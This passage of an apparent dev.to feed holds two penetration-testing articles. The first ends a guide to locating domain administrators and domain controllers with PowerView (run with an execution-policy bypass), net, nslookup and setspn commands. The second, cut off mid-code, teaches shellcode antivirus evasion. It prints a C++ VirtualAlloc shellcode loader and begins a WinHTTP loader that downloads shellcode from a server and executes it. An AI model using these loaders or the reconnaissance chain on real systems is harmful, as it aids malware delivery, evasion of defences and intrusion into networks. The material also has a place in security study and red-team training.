&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-u&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Checks if a newer version of the programme is available.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-current ["username"]&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Displays the user currently logged on to each PC within the domain. If a username is specified in quotation marks, it only displays PCs where that particular user is logged on.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-noping&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Prevents the tool from pinging target computers before attempting to enumerate user logons.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-target&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;An optional parameter for specifying a comma-separated list of hostnames to query. If omitted, all hosts in the current domain are queried. Results are output to a &lt;code&gt;report.csv&lt;/code&gt; file.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Executing the command &lt;code&gt;pvefinaduser.exe -current&lt;/code&gt; will display all users currently logged on to all machines within the domain.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4bproa3o2ngqgr53dd8h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F4bproa3o2ngqgr53dd8h.png" alt="Figure 4: Console output of PVefindaduser.exe showing current logon sessions across the domain" width="800" height="465"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 4: Console output of PVefindaduser.exe showing current logon sessions across the domain
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;This operation generates a &lt;code&gt;report.csv&lt;/code&gt; file on the target machine, which can be retrieved for subsequent analysis.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fp0cfxnepw7w50qumm86j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fp0cfxnepw7w50qumm86j.png" alt="Figure 5: The contents of the generated report.csv file, detailing user logon locations." width="800" height="45"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 5: The contents of the generated report.csv file, detailing user logon locations.
  &lt;p&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  PowerView.ps1
&lt;/h4&gt;

&lt;p&gt;This PowerShell script is a component of the PowerSploit toolkit and serves as a robust instrument for gathering domain information. A suite of cmdlets is provided, including &lt;code&gt;Get-NetUser&lt;/code&gt;, &lt;code&gt;Get-NetDomainController&lt;/code&gt;, and &lt;code&gt;Invoke-UserHunter&lt;/code&gt;, which specifically aids in identifying the computers to which domain users are logged on and whether they possess local administrator privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Download Link:&lt;/strong&gt; &lt;code&gt;https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;To locate Domain Administrators using PowerView, one may bypass the execution policy and invoke the script as demonstrated below:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;powershell.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-exec&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bypass&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"&amp;amp; {Import-Module C:\Users\win7\Desktop\tool\PowerView.ps1; Invoke-UserEvenHunter}"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7w8wfk9guat9fqx8g4lv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F7w8wfk9guat9fqx8g4lv.png" alt="Figure 6: Output from the Invoke-UserEvenHunter function in PowerView, identifying logged-on domain users." width="672" height="331"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 6: Output from the Invoke-UserEvenHunter function in PowerView, identifying logged-on domain users.
  &lt;p&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Locating Domain Controllers
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Command Line Identification
&lt;/h3&gt;

&lt;p&gt;A Domain Controller can be identified by querying the relevant domain group with the command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net group "Domain controllers" /Domain        //View Domain Controllers
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxopac9lio7knaw5tbqig.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxopac9lio7knaw5tbqig.png" alt="Figure 7: Results of the 'net group' command, showing the Domain Controller computer account." width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 7: Results of the 'net group' command, showing the Domain Controller computer account.
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Alternatively, the &lt;code&gt;net time&lt;/code&gt; command can be utilised to reveal the Domain Controller serving the logon server role:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;net time /do
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F5vktm1hsf94hu8k0wizs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F5vktm1hsf94hu8k0wizs.png" alt="Figure 7: Results of the 'net group' command, showing the Domain Controller computer account." width="800" height="151"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 8: Output showing the domain time, which implicitly reveals the Domain Controller's hostname.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  DNS Record Enumeration
&lt;/h3&gt;

&lt;p&gt;Should the local machine's configured DNS server be a domain-integrated DNS server, querying specific service location (SRV) records can identify Domain Controllers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nslookup -type=all _ldap._tcp.dc._msdcs.tubai.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhm4n8evf145g9ioxfw0t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhm4n8evf145g9ioxfw0t.png" alt="Figure 9: Nslookup query results showing SRV records that point to Domain Controllers." width="800" height="301"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 9: Nslookup query results showing SRV records that point to Domain Controllers.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Port Probing
&lt;/h3&gt;

&lt;p&gt;Domain Controllers typically expose a characteristic set of ports. Port &lt;code&gt;389&lt;/code&gt; is the default port for the Lightweight Directory Access Protocol (LDAP), port &lt;code&gt;636&lt;/code&gt; is for LDAP over SSL/TLS (LDAPS), and port &lt;code&gt;53&lt;/code&gt; is the standard port for the Domain Name System (DNS) service. A targeted scan for hosts within the internal network range that have these specific ports open can reveal potential Domain Controllers.&lt;/p&gt;

&lt;p&gt;A direct probe of the identified Domain Controller's IP address on these key ports confirms its role.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1lgxdkj5znzcr64y1i9u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F1lgxdkj5znzcr64y1i9u.png" alt="Figure 10: A port scan confirming that ports 53, 389, and 636 are open on a Domain Controller." width="547" height="388"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 10: A port scan confirming that ports 53, 389, and 636 are open on a Domain Controller.
  &lt;p&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  SPN Scanning
&lt;/h3&gt;

&lt;p&gt;Service Principal Name (SPN) scanning is a stealthier alternative to conventional TCP or UDP port scanning, as it utilises standard Kerberos authentication requests. Most Windows installations include the native &lt;code&gt;setspn.exe&lt;/code&gt; utility, which does not require administrative rights to perform queries.&lt;/p&gt;

&lt;p&gt;The following command, executed from a domain-joined machine, can identify Domain Controllers by their registered SPNs:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;setspn -T tubai.com -Q */*
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Within the scan results, Domain Controllers can be distinguished by canonical names containing the string &lt;code&gt;OU=Domain Controllers&lt;/code&gt;, such as &lt;code&gt;CN=AD-SERVER,OU=Domain Controllers,DC=tubai,DC=com&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqyhl7pnyyzc3j43pyodx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqyhl7pnyyzc3j43pyodx.png" alt="Figure 10: A port scan confirming that ports 53, 389, and 636 are open on a Domain Controller." width="799" height="488"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 11: The output of an SPN scan, with the Domain Controller's service account highlighted.
  &lt;p&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;Numerous methods exist for identifying Domain Administrators and Domain Controllers; the techniques described herein represent only the most frequently employed. During routine internal network penetration tests, it is a cardinal principle to prioritise techniques that generate minimal detectable activity.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>domain</category>
      <category>penetration</category>
      <category>network</category>
    </item>
    <item>
      <title>A Summary of Shellcode Evasion Techniques</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 24 Jun 2026 06:51:10 +0000</pubDate>
      <link>https://dev.to/excalibra/a-summary-of-shellcode-evasion-techniques-4350</link>
      <guid>https://dev.to/excalibra/a-summary-of-shellcode-evasion-techniques-4350</guid>
      <description>&lt;h1&gt;
  
  
  Shellcode Evasion Techniques: A Practical Guide
&lt;/h1&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;I aim to elucidate shellcode evasion techniques in an accessible, straightforward manner, using plain language and practical examples. It is my hope that fellow penetration testers with a background in web application security will also be able to implement these evasion methods effectively.&lt;/p&gt;

&lt;p&gt;In this article, I have categorised shellcode evasion techniques into two primary classifications: &lt;strong&gt;"Separation"&lt;/strong&gt; and &lt;strong&gt;"Obfuscation"&lt;/strong&gt;. These techniques target distinct detection methodologies employed by security solutions, namely signature-based detection, behavioural analysis, and cloud-based heuristic scanning.&lt;/p&gt;

&lt;p&gt;Please note that my expertise is limited; should any errors be identified, I welcome corrections and constructive feedback.&lt;/p&gt;




&lt;h2&gt;
  
  
  0x01 Shellcode "Separation" Evasion
&lt;/h2&gt;

&lt;p&gt;Let us first examine the conventional C/C++ loading methods commonly utilised for shellcode execution.&lt;/p&gt;

&lt;p&gt;Typical approaches include function pointer execution, inline assembly instructions, pseudo-instructions, and similar techniques.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftackmyaw1bzdqvnjefw7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ftackmyaw1bzdqvnjefw7.png" alt="Figure 1: Traditional shellcode loading example showing inline shellcode within the executable." width="800" height="343"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 1: Traditional shellcode loading example showing inline shellcode within the executable.
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;However, this approach—where the shellcode resides within the same executable file—renders the resulting binary highly susceptible to detection by antivirus solutions.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnhcgctx08jvrn8ima24z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fnhcgctx08jvrn8ima24z.png" alt="Figure 2: AV detection results for executables with embedded shellcode" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 2: AV detection results for executables with embedded shellcode
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;Consequently, the prevailing philosophy behind separation-based evasion is to decouple the shellcode from the loader program itself.&lt;/p&gt;

&lt;p&gt;Let us examine a common separation-based loading implementation using C++ as an illustrative example:&lt;/p&gt;

&lt;p&gt;A typical implementation employs memory allocation functions such as &lt;code&gt;VirtualAlloc&lt;/code&gt; to execute shellcode:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"windows.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="c1"&gt;// ... shellcode truncated for brevity ...&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x63\x61\x6c\x63\x2e\x65\x78\x65\x00&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;memcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)())&lt;/span&gt;&lt;span class="n"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;)();&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fq25w2lo7sqtbbwq4pjzl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fq25w2lo7sqtbbwq4pjzl.png" alt="Figure 3: Standard shellcode execution flow using VirtualAlloc" width="800" height="631"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 3: Standard shellcode execution flow using VirtualAlloc
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;To achieve true separation, we can retrieve the shellcode from external sources rather than embedding it statically within the binary. This can be accomplished through various means, such as extracting shellcode from text files or downloading it from remote servers.&lt;/p&gt;

&lt;p&gt;The following example demonstrates retrieving shellcode via an HTTP request using the WinHTTP API, storing it in a memory buffer, and subsequently allocating executable memory for execution:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"stdafx.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;iostream&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;windows.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;winhttp.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#pragma comment(lib,"winhttp.lib")
#pragma comment(lib,"user32.lib")
&lt;/span&gt;&lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="n"&gt;std&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;dwDownloaded&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;LPSTR&lt;/span&gt; &lt;span class="n"&gt;pszOutBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;HINTERNET&lt;/span&gt;  &lt;span class="n"&gt;hSession&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;hConnect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;hRequest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;BOOL&lt;/span&gt;  &lt;span class="n"&gt;bResults&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;hSession&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpOpen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;L"User-Agent"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_ACCESS_TYPE_DEFAULT_PROXY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_NO_PROXY_NAME&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_NO_PROXY_BYPASS&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;hConnect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpConnect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hSession&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"127.0.0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;INTERNET_DEFAULT_HTTP_PORT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;hRequest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;WinHttpOpenRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hConnect&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"POST"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"qing.txt"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"HTTP/1.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_NO_REFERER&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_DEFAULT_ACCEPT_TYPES&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;LPCWSTR&lt;/span&gt; &lt;span class="n"&gt;header&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;L"Content-type: application/x-www-form-urlencoded/r/n"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;SIZE_T&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;lstrlenW&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;header&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;WinHttpAddRequestHeaders&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;header&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;WINHTTP_ADDREQ_FLAG_ADD&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
